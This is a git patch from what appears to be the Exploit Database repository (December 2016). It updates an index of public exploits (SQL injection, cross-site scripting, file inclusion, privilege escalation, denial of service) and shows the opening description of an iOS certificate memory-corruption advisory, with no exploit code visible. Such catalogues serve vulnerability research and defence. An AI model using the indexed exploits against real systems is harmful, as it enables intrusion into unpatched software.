From b080c70f8b4c47f62e153ee12ae72f4ac11bfbcc Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 14 Dec 2016 05:01:23 +0000
Subject: [PATCH] DB: 2016-12-14
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

7 new exploits

Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)

Xitami Web Server 5.0a0 - Denial of Service
OpenSSL 1.1.0a/1.1.0b - Denial of Service
Serva 3.0.0 HTTP Server - Denial of Service
iOS 10.1.x - Certificate File Memory Corruption

OpenBSD 4.0 - (vga) Privilege Escalation
OpenBSD 4.0 - 'vga' Privilege Escalation

10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow

MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections
MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections

AShop Deluxe 4.x - (catalogue.php cat) SQL Injection
AShop Deluxe 4.x - 'catalogue.php' SQL Injection

HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion
HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion

CAT2 - (spaw_root) Local File Inclusion
CAT2 - 'spaw_root' Parameter Local File Inclusion

MyBloggie 2.1.3 - search.php SQL Injection
MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting

MyBloggie 2.1.x - Multiple Remote File Inclusion

MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion
MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion
AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting
AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting
AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting

MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting

MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting
Smart Guard Network Manager 6.3.2 - SQL Injection
WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery
---
 files.csv                        |  59 +++++++------
 platforms/ios/dos/40906.txt      | 139 +++++++++++++++++++++++++++++++
 platforms/linux/dos/40899.py     | 123 +++++++++++++++++++++++++++
 platforms/php/webapps/26326.html |  14 ----
 platforms/php/webapps/27957.txt  |  12 ---
 platforms/php/webapps/40904.txt  |  27 ++++++
 platforms/php/webapps/40908.html |  64 ++++++++++++++
 platforms/windows/dos/40905.py   |  72 ++++++++++++++++
 platforms/windows/dos/40907.html |  47 +++++++++++
 platforms/windows/local/40903.py |  32 +++++++
 10 files changed, 536 insertions(+), 53 deletions(-)
 create mode 100755 platforms/ios/dos/40906.txt
 create mode 100755 platforms/linux/dos/40899.py
 delete mode 100755 platforms/php/webapps/26326.html
 delete mode 100755 platforms/php/webapps/27957.txt
 create mode 100755 platforms/php/webapps/40904.txt
 create mode 100755 platforms/php/webapps/40908.html
 create mode 100755 platforms/windows/dos/40905.py
 create mode 100755 platforms/windows/dos/40907.html
 create mode 100755 platforms/windows/local/40903.py

diff --git a/files.csv b/files.csv
index bec4b9934..09fc77181 100644
--- a/files.csv
+++ b/files.csv
@@ -3556,6 +3556,7 @@ id,file,description,date,author,platform,type,port
 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0
 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0
 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
+40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
 27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0
 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0
 28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0
@@ -3996,7 +3997,7 @@ id,file,description,date,author,platform,type,port
 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
 31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
-40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,"Stefan Petrushevski",windows,dos,0
+40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,windows,dos,0
 31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
 31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
 31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
@@ -5300,6 +5301,9 @@ id,file,description,date,author,platform,type,port
 40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
 40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos,0
+40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
+40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
+40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5865,7 +5869,7 @@ id,file,description,date,author,platform,type,port
 5667,platforms/windows/local/5667.py,"VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal Exploit",2008-05-23,j0rgan,windows,local,0
 5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0
 5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local,0
-5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
+5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0
 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0
 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0
@@ -8692,6 +8696,7 @@ id,file,description,date,author,platform,type,port
 40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
 40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
+40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -16370,7 +16375,7 @@ id,file,description,date,author,platform,type,port
 2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0
 2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0
 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0
-2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
+2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
 2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0
@@ -19064,12 +19069,12 @@ id,file,description,date,author,platform,type,port
 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0
 5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0
 5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
-5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
+5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,php,webapps,0
 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
 5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
-5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
+5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
-5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
+5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
 5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
 5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
 5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0
@@ -28115,7 +28120,6 @@ id,file,description,date,author,platform,type,port
 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0
-26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - search.php SQL Injection",2005-10-06,trueend5,php,webapps,0
 26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0
 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0
 26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - newmsg.php fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0
@@ -28941,16 +28945,16 @@ id,file,description,date,author,platform,type,port
 27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0
 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0
 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0
-27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
-27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
+27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
 27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
 27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - calendar.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
 27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - forums.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
@@ -29372,7 +29376,6 @@ id,file,description,date,author,platform,type,port
 27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Inclusion",2006-06-02,ERNE,php,webapps,0
 27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0
@@ -29623,7 +29626,7 @@ id,file,description,date,author,platform,type,port
 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0
 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0
 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0
-28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
+28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
@@ -30379,12 +30382,12 @@ id,file,description,date,author,platform,type,port
 29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0
 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0
-29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
-29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
+29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
 29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - search.asp Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0
 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
 29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
@@ -30458,9 +30461,9 @@ id,file,description,date,author,platform,type,port
 29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - new.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
 29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
 29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
-29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
+29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
 40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
-29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
+29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
@@ -36865,3 +36868,5 @@ id,file,description,date,author,platform,type,port
 40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
 40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
+40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
+40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
diff --git a/platforms/ios/dos/40906.txt b/platforms/ios/dos/40906.txt
new file mode 100755
index 000000000..6245f9af5
--- /dev/null
+++ b/platforms/ios/dos/40906.txt
@@ -0,0 +1,139 @@
+Source: https://cxsecurity.com/issue/WLB-2016110046
+
+iOS 10.1.x Remote memory corruption through certificate file
+Credit: Maksymilian Arciemowicz from https://cxsecurity.com
+
+--------------------------------------------------------------------------------------
+0. Short description
+Special crafted certificate file may lead to memory corruption of several processes and the vector attack may be through Mobile Safari or Mail app. Attacker may control the overflow through the certificate length in OCSP field
+
+--------------------------------------------------------------------------------------
